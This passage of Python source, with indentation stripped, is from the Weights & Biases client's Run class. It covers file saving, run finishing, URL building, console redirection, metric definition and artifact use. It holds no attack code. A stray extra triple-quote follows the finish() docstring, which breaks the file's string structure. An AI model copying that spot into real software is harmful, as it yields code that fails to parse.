base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend and self._backend.interface:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code: int = None, quiet: Optional[bool] = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process. We automatically
call this method when your script exits or if you use the run context manager.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
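Examples:
A minimal sketch for multiple runs in one process (config values are placeholders):
```python
import wandb
for lr in [0.01, 0.001]:
    run = wandb.init(reinit=True, config={"lr": lr})
    run.log({"loss": 0.1})
    run.finish()
```
"""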
"""
if quiet is not None:
self._quiet = quiet
with telemetry.context(run=self) as tel:
tel.feature.finish = True
logger.info("finishing run %s", self.path)
# detach jupyter hooks / others that need to happen before backend shutdown
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.EARLY:
hook.call()
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
# detach logger / others meant to be run after we've shut down the backend
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.LATE:
hook.call()
self._teardown_hooks = []
module.unset_globals()
# inform manager this run is finished
manager = self._wl and self._wl._get_manager()
if manager:
manager._inform_finish(run_id=self.id)
def join(self, exit_code: int = None) -> None:
"""Deprecated alias for `finish()` - please use finish."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__join,
warning_message=(
"wandb.run.join() is deprecated, please use wandb.run.finish()."
),
)
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
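Example:
A minimal sketch using wandb's bundled line-plot spec (the spec name and
field mapping are assumptions, not guaranteed by this method):
```python
import wandb
run = wandb.init()
table = wandb.Table(data=[[1, 2], [2, 4], [3, 9]], columns=["x", "y"])
chart = run.plot_table(
    "wandb/line/v0", table, {"x": "x", "y": "y"}, {"title": "y vs x"}
)
run.log({"my_chart": chart})
```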
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg: str) -> None:
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg: str) -> None:
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg: str) -> None:
self._yanked_version_message = msg
def _add_panel(
self, visualize_key: str, panel_type: str, panel_config: dict
) -> None:
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self) -> str:
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self) -> str:
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self) -> str:
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self) -> str:
"""Generate a url for a sweep.
Returns:
(str): the sweep url if the run is part of a sweep, otherwise an empty string
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self) -> str:
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self) -> None:
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = f"Tracking run with wandb version {wandb.__version__}"
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
sync_dir = self._settings.sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython.in_jupyter():
if not wandb.jupyter.maybe_display():
# TODO: make settings the source of truth
self._quiet = wandb.jupyter.quiet()
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url and not self._quiet
else ""
)
docs_html = (
""
if self._quiet
else '(<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">docs</a>)'
) # noqa: E501
project_html = (
""
if self._quiet
else f'<a href="{project_url}" target="_blank">Weights & Biases</a>'
)
ipython.display_html(
"""
{} <strong><a href="{}" target="_blank">{}</a></strong> to {} {}.<br/>\n{}
""".format( # noqa: E501
run_state_str,
run_url,
run_name,
project_html,
docs_html,
sweep_line,
)
)
else:
if not self._quiet:
wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows" and is_unicode_safe(sys.stdout):
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
if not self._quiet:
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
if not self._quiet:
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
api = internal.Api()
if api.settings().get("anonymous") == "true":
wandb.termwarn(
"Do NOT share these links with anyone. They can be used to claim your runs."
)
print("")
def _redirect(
self,
stdout_slave_fd: Optional[int],
stderr_slave_fd: Optional[int],
console: SettingsConsole = None,
) -> None:
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
out_redir: redirect.RedirectBase
err_redir: redirect.RedirectBase
if console == SettingsConsole.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback() -> None:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=SettingsConsole.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == SettingsConsole.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == SettingsConsole.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self) -> None:
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code: int = None) -> None:
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or (self._hooks.exit_code if self._hooks else 0)
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self) -> None:
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
manager = self._wl and self._wl._get_manager()
if not manager:
# NB: manager will perform atexit hook like behavior for outstanding runs
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self) -> None:
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self) -> None:
self._show_version_info()
def _on_start(self) -> None:
# TODO: make offline mode in jupyter use HTML
if self._settings._offline and not self._quiet:
message = (
"W&B syncing is set to `offline` in this directory. ",
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing.",
)
if self._settings._jupyter and ipython.in_jupyter():
ipython.display_html("<br/>\n".join(message))
else:
for m in message:
wandb.termlog(m)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
# TODO(wandb-service) RunStatusChecker not supported yet (WB-7352)
if self._backend and self._backend.interface and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress: FilePusherStats,
prefix: bool = True,
done: Optional[bool] = False,
) -> None:
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress: FilePusherStats, done: bool = None) -> None:
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self) -> PollExitResponse:
while True:
if self._backend and self._backend.interface:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self) -> None:
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
as_html = self._settings._jupyter and ipython.in_jupyter()
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}... ".format(pid)
if not self._exit_code:
status = "(success)."
if as_html:
status = f'<strong style="color:green">{status}</strong>'
status_str += status
else:
status = "(failed {}).".format(self._exit_code)
if as_html:
status = f'<strong style="color:red">{status}</strong>'
status_str += status
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if as_html:
sep = "<br/>" if not self._quiet else ""
ipython.display_html(sep + status_str)
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend and self._backend.interface:
self._backend.interface._publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend and self._backend.interface:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend and self._backend.interface:
ret = self._backend.interface.communicate_get_summary()
if ret:
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend and self._backend.interface:
sampled = self._backend.interface.communicate_sampled_history()
if sampled:
d: Dict[str, Union[Sequence[int], Sequence[float]]] = {}
for item in sampled.item:
d[item.key] = (
item.values_float if item.values_float else item.values_int
)
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self) -> None:
as_html = self._settings._jupyter and ipython.in_jupyter()
if as_html:
lb = "<br/>\n"
else:
lb = "\n"
# check for warnings and errors, show log file locations
final_logs = ""
if self._reporter and not self._quiet:
warning_lines = self._reporter.warning_lines
if warning_lines:
final_logs += f"Warnings:{lb}"
for line in warning_lines:
final_logs += f"{line}{lb}"
if len(warning_lines) < self._reporter.warning_count:
final_logs += f"More warnings...{lb}"
error_lines = self._reporter.error_lines
if error_lines:
final_logs += f"Errors:{lb}"
for line in error_lines:
final_logs += f"{line}{lb}"
if len(error_lines) < self._reporter.error_count:
final_logs += f"More errors...{lb}"
if not self._quiet:
final_logs += self._append_details(final_logs, as_html)
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if as_html:
final_logs += 'Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a>{}'.format(
RUN_NAME_COLOR, run_name, run_url, run_url, lb
)
else:
final_logs += "Synced {}: {}{}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
lb,
)
if self._settings._offline and not self._quiet:
final_logs += f"You can sync this run to the cloud by running:{lb}"
final_logs += click.style(
f"wandb sync {self._settings.sync_dir}{lb}", fg="yellow"
)
if not self._quiet and (self._settings.log_user or self._settings.log_internal):
log_dir = self._settings.log_user or self._settings.log_internal or "."
log_dir = log_dir.replace(os.getcwd(), ".")
if as_html:
log_dir = "<code>{}</code>".format(os.path.dirname(log_dir))
final_logs += "Find logs at: {}{}".format(log_dir, lb)
if as_html:
ipython.display_html(final_logs)
else:
wandb.termlog(final_logs)
if not self._quiet:
self._show_version_info(footer=True)
self._show_local_warning()
def _show_version_info(self, footer: bool = None) -> None:
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _append_details(self, logs: str, as_html: bool = False) -> str:
if as_html:
logs += ipython.TABLE_STYLES
logs += '<div class="wandb-row"><div class="wandb-col">\n'
logs = self._append_history(logs, as_html)
if as_html:
logs += '</div><div class="wandb-col">\n'
logs = self._append_summary(logs, as_html)
if as_html:
logs += "</div></div>\n"
return self._append_files(logs, as_html)
def _append_summary(self, logs: str, as_html: bool = False) -> str:
if self._final_summary:
logger.info("rendering summary")
max_len = 0
summary_rows = []
for k, v in sorted(iteritems(self._final_summary)):
# arrays etc. might be too large. for now we just don't print them
if k.startswith("_"):
continue
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
else:
continue
max_len = max(max_len, len(k))
if not summary_rows:
return logs
if as_html:
summary_table = '<table class="wandb">'
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>\n"
logs += "<h3>Run summary:</h3><br/>" + summary_table
else:
format_str = " {:>%s} {}" % max_len
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
logs += f"Run summary:\n{summary_lines}\n\n"
return logs
def _append_history(self, logs: str, as_html: bool = False) -> str:
if not self._sampled_history:
return logs
# Only print sparklines if the terminal is utf-8
if not is_unicode_safe(sys.stdout):
return logs
logger.info("rendering history")
max_len = 0
history_rows = []
for key in sorted(self._sampled_history):
if key.startswith("_"):
continue
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
max_len = max(max_len, len(key))
if not history_rows:
return logs
if as_html:
history_table = '<table class="wandb">'
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
logs += "<h3>Run history:</h3><br/>" + history_table + "<br/>"
else:
logs += "Run history:\n"
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
logs += history_lines.rstrip() + "\n\n"
return logs
def _show_local_warning(self) -> None:
if not self._poll_exit_response or not self._poll_exit_response.local_info:
return
if self._settings._offline:
return
if self._settings.is_local:
local_info = self._poll_exit_response.local_info
latest_version, out_of_date = local_info.version, local_info.out_of_date
if out_of_date:
wandb.termwarn(
f"Upgrade to the {latest_version} version of W&B Local to get the latest features. Learn more: http://wandb.me/local-upgrade"
)
def _append_files(self, logs: str, as_html: bool = False) -> str:
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return logs
if self._settings._offline:
return logs
logger.info("logging synced files")
if self._settings._silent:
return logs
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s){}".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
"\n<br/>" if as_html else "\n",
)
logs += file_str
return logs
def _save_job_spec(self) -> None:
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = dict(self._config)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name: str,
step_metric: Union[str, wandb_metric.Metric, None] = None,
step_sync: bool = None,
hidden: bool = None,
summary: str = None,
goal: str = None,
overwrite: bool = None,
**kwargs: Any,
) -> wandb_metric.Metric:
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min", "max", "mean", "best", "last", "copy", "none".
Default aggregation is `copy`.
Aggregation `best` defaults to `goal`==`minimize`.
goal: Specify direction for optimizing the metric.
Supported directions: "minimize", "maximize"
Returns:
A metric object is returned that can be further specified.
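Examples:
A minimal sketch (metric names are placeholders):
```python
import wandb
run = wandb.init()
# plot "val_loss" against "epoch" and keep only its minimum in the summary
run.define_metric("epoch")
run.define_metric("val_loss", step_metric="epoch", summary="min")
run.log({"epoch": 1, "val_loss": 0.5})
```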
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops: Optional[Sequence[str]] = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned: Optional[str] = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None, log_graph=False) -> None: # type: ignore
wandb.watch(models, criterion, log, log_freq, idx, log_graph)
# TODO(jhr): annotate this
def unwatch(self, models=None) -> None: # type: ignore
wandb.unwatch(models=models)
def _swap_artifact_name(self, artifact_name: str, use_as: Optional[str]) -> str:
artifact_key_string = use_as or artifact_name
replacement_artifact_info = self._launch_artifact_mapping.get(
artifact_key_string
)
if replacement_artifact_info is not None:
new_name = replacement_artifact_info.get("name")
entity = replacement_artifact_info.get("entity")
project = replacement_artifact_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
elif replacement_artifact_info is None and use_as is None:
wandb.termwarn(
f"Could not find {artifact_name} in launch artifact mapping. Searching for unique artifacts with sequence name: {artifact_name}"
)
sequence_name = artifact_name.split(":")[0].split("/")[-1]
unique_artifact_replacement_info = self._unique_launch_artifact_sequence_names.get(
sequence_name
)
if unique_artifact_replacement_info is not None:
new_name = unique_artifact_replacement_info.get("name")
entity = unique_artifact_replacement_info.get("entity")
project = unique_artifact_replacement_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
else:
wandb.termwarn(
f"Could not find swappable artifact at key: {use_as}. Using {artifact_name}"
)
return artifact_name
wandb.termwarn(
f"Could not find {artifact_key_string} in launch artifact mapping. Using {artifact_name}"
)
return artifact_name
def _detach(self) -> None:
pass
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None, use_as=None): # type: ignore
"""Declare an artifact as an input to a run.
Call `download` or `file` on the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project/. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
use_as: (str, optional) A string indicating the purpose for which the artifact was used. Will be shown in the UI.
Returns:
An `Artifact` object.
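Example:
A minimal sketch; the artifact name and type below are illustrative:
```python
import wandb
run = wandb.init()
# Declare the artifact as an input and fetch its contents locally.
artifact = run.use_artifact("pedestrian-dataset:v1", type="dataset")
local_dir = artifact.download()
```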
"""
if self.offline:
raise TypeError("Cannot use artifact when in offline mode.")
if use_as:
if use_as in self._used_artifact_slots:
raise ValueError(
"Cannot call use_artifact with the same use_as argument more than once"
)
elif ":" in use_as or "/" in use_as:
raise ValueError("use_as cannot contain special characters ':' or '/'")
self._used_artifact_slots.append(use_as)
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
if self._launch_artifact_mapping:
name = self._swap_artifact_name(artifact_or_name, use_as)
else:
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
artifact._use_as = use_as or artifact_or_name
api.use_artifact(
artifact.id, use_as=use_as or artifact_or_name,
)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
if use_as is not None:
wandb.termwarn(
"Indicating use_as is not supported when using an artifact with an instance of wandb.Artifact"
)
self._log_artifact(
artifact,
aliases=aliases,
is_user_created=True,
use_after_commit=True,
)
return artifact
elif isinstance(artifact, public.Artifact):
if self._launch_artifact_mapping is not None:
wandb.termwarn(
f"Swapping artifacts does not support swapping artifacts used as an instance of `public.Artifact`. Using {artifact.name}"
)
api.use_artifact(
artifact.id, use_as=use_as or artifact._use_as or artifact.name
)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> wandb_artifacts.Artifact:
"""Declare an artifact as an output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
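Example:
A minimal sketch; the artifact name, type, and file path are illustrative:
```python
import wandb
run = wandb.init()
artifact = wandb.Artifact("my-dataset", type="dataset")
artifact.add_file("data.csv")  # assumes data.csv exists locally
run.log_artifact(artifact)
```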
"""
return self._log_artifact(
artifact_or_path, name=name, type=type, aliases=aliases
)
def upsert_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Declare (or append to) a non-finalized artifact as output of a run.
Note that you must call run.finish_artifact() to finalize the artifact.
This is useful when distributed jobs need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
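Example:
A minimal sketch of one worker in a distributed job; the group name, artifact
name, and directory are illustrative:
```python
import wandb
run = wandb.init(group="dist-ingest")  # distributed_id defaults to the group
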